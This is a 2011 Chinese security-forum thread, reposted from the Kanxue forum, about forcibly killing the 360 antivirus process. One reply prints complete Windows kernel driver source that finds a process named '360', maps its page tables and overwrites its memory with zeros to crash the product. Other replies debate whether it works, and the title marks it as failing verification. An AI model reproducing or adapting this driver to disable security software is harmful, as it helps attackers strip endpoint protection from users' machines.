【转帖】暴力强杀进程代码，可杀360（验证无效）

显示全部楼层 · 发表于 2011-4-19 02:46:20

本帖最后由七宝于 2011-4-19 11:16 编辑

http://bbs.pediy.com/showthread.php?t=132600&highlight=360

代为修改标题 by七宝

显示全部楼层 · 发表于 2011-4-19 07:45:18

本帖最后由悟心之道于 2011-4-19 09:05 编辑

1 等人验证。
2 什么程序都敢直接执行杯具总是难免的。
3 帮楼上的补代码，原码出处就在LZ的链接页面上。
#include <ntddk.h>

#define HYPER_SPACE_BASE (0xc0800000)
#define PDE_BASE (0xc0600000)
#define PTE_BASE (0xc0000000)

#define DIRECTORY_TABLE_BASE (0x18)
#define ACTIVE_PROCESS_LINKS_OFFSET (0x88)
#define IMAGE_FILE_NAME_OFFSET (0x174)

#define PROCESS_TO_TERMINATE ("360")

ULONG MapPhysicalAddrToHyperSpace(ULONG PhysicalAddr);
VOID DeleteMapping(ULONG Addr);
VOID DriverUnload(PDRIVER_OBJECT pDriverObject);

NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject,PUNICODE_STRING pRegistryPath)
{
  PEPROCESS pCurrProcess = NULL;
  PEPROCESS pSysProcess = NULL;
  ULONG cr3 = 0;
  ULONG MappedCr3Addr = 0;
  ULONG MappedPdeAddr = 0;
  ULONG MappedPteAddr = 0;
  ULONG MappedRealAddr = 0;
  ULONG i = 0;
  ULONG j = 0;
  ULONG s = 0;
  ULONG t = 0;

  pDriverObject->DriverUnload = DriverUnload;

  pCurrProcess = PsGetCurrentProcess();
  pSysProcess = pCurrProcess;
  pCurrProcess = (PEPROCESS)(*(PULONG)((ULONG)pCurrProcess + ACTIVE_PROCESS_LINKS_OFFSET) - ACTIVE_PROCESS_LINKS_OFFSET);

  while(RtlCompareMemory((PUCHAR)((ULONG)pCurrProcess + IMAGE_FILE_NAME_OFFSET),PROCESS_TO_TERMINATE,3) != 3)
  {
pCurrProcess = (PEPROCESS)(*(PULONG)((ULONG)pCurrProcess + ACTIVE_PROCESS_LINKS_OFFSET) - ACTIVE_PROCESS_LINKS_OFFSET);

if(pCurrProcess == pSysProcess)
{
   return STATUS_UNSUCCESSFUL;
}
  }

  cr3 = *(PULONG)((ULONG)pCurrProcess + DIRECTORY_TABLE_BASE);

  MappedCr3Addr = MapPhysicalAddrToHyperSpace(cr3);

  if(!MappedCr3Addr)
  {
return STATUS_UNSUCCESSFUL;
  }

  for(t = 0;t < 1;t++)
  {

MappedPdeAddr = MapPhysicalAddrToHyperSpace(*(PULONG)(MappedCr3Addr + t * 8) & 0xfffff000);

if(!MappedPdeAddr)
{
   return STATUS_UNSUCCESSFUL;
}

for(i = 0;i < 512;i++)
{
   if(*(PULONG)(MappedPdeAddr + i * 8) & 1)
   {
      /*if((*(PULONG)(MappedPdeAddr + i * 8) & 0x80) && !(*(PULONG)(MappedPdeAddr + i * 8 + 4) & 80000000))
      {
      for(j = 0;j < 512;j++)
      {
         MappedRealAddr = MapPhysicalAddrToHyperSpace((*(PULONG)(MappedPdeAddr + i * 8) + j * 4096)& 0xfffff000);

         for(s = 0;s < 1024;s++)
         {
            *(PULONG)(MappedRealAddr + s*4) = 0;
         }

         DeleteMapping(MappedRealAddr);
      }

      continue;
      }*/

      if(*(PULONG)(MappedPdeAddr + i * 8) & 0x80)
      {
      return STATUS_UNSUCCESSFUL;
      }

      MappedPteAddr = MapPhysicalAddrToHyperSpace(*(PULONG)(MappedPdeAddr + i * 8) & 0xfffff000);

      if(!MappedPteAddr)
      {
      return STATUS_UNSUCCESSFUL;
      }

      for(j = 0;j < 512;j++)
      {
      //if((*(PULONG)(MappedPteAddr + j * 8) & 1) && !(*(PULONG)(MappedPteAddr + j * 8 + 4) & 0x80000000))
      if(*(PULONG)(MappedPteAddr + j * 8) & 1)
      {
         MappedRealAddr = MapPhysicalAddrToHyperSpace(*(PULONG)(MappedPteAddr + j * 8) & 0xfffff000);

         if(!MappedRealAddr)
         {
            return STATUS_UNSUCCESSFUL;
         }

         for(s = 0;s < 1024;s++)
         {
            *(PULONG)(MappedRealAddr + s*4) = 0;
         }

         DeleteMapping(MappedRealAddr);
      }
      }

      DeleteMapping(MappedPteAddr);
   }

   if(t == 1 && i >= 383)
   {
      break;
   }
}

DeleteMapping(MappedPdeAddr);
  }

  DeleteMapping(MappedCr3Addr);

  return STATUS_SUCCESS;
}

ULONG MapPhysicalAddrToHyperSpace(ULONG PhysicalAddr)
{
  ULONG RoundDownPhysicalAddr = PhysicalAddr & 0xfffff000;
  ULONG Entry = RoundDownPhysicalAddr | 0x3;
  ULONG HyperSpacePteBase = (HYPER_SPACE_BASE >> 12) * 8 + PTE_BASE;
  ULONG i = 0;
  ULONG Address = 0;

  for(; i < 1024;i++)
  {
if(*(PULONG)(HyperSpacePteBase + i * 8) == 0)
{
   *(PULONG)(HyperSpacePteBase + i*8) = Entry;

   Address = HYPER_SPACE_BASE + i * 0x1000 + PhysicalAddr - RoundDownPhysicalAddr;

   __asm invlpg Address

   return Address;
}
  }

  return 0;
}

VOID DeleteMapping(ULONG Addr)
{
  *(PULONG)((Addr >> 12) * 8 + PTE_BASE) = 0;

  return;
}

VOID DriverUnload(PDRIVER_OBJECT pDriverObject)
{
  return;
}

显示全部楼层 · 发表于 2011-4-19 08:20:23

只有标题含有过360 干360 必火

显示全部楼层 · 发表于 2011-4-19 08:37:37

kmelon 发表于 2011-4-19 08:20
只有标题含有过360 干360 必火

也说明“干掉”360确实有一定难度，其次也因部分人“神话”360所至，不过不断的被干掉，进而不被同样方式干掉，也能促进自保进步

显示全部楼层 · 发表于 2011-4-19 08:42:34

最近尽是这些贴，邪门的是都不验证就发上来。

显示全部楼层 · 发表于 2011-4-19 09:06:45

有谁试过，真能干掉？

显示全部楼层 · 发表于 2011-4-19 09:25:02

-oAo- 发表于 2011-4-19 09:06
有谁试过，真能干掉？

现在的云安全反应速度反快，想要试也应该再做一些改动。
感觉这个编程颇为复杂

显示全部楼层 · 发表于 2011-4-19 09:48:08

悟心之道发表于 2011-4-19 09:25
现在的云安全反应速度反快，想要试也应该再做一些改动。
感觉这个编程颇为复杂

云安全反应速度确实不慢了

显示全部楼层 · 发表于 2011-4-19 09:51:09

又是看雪，又是搞定360,mj都烦了

显示全部楼层 · 发表于 2011-4-19 09:54:04

看雪似乎有人验证过，加驱被拦截

[讨论] 【转帖】暴力强杀进程代码，可杀360（验证无效）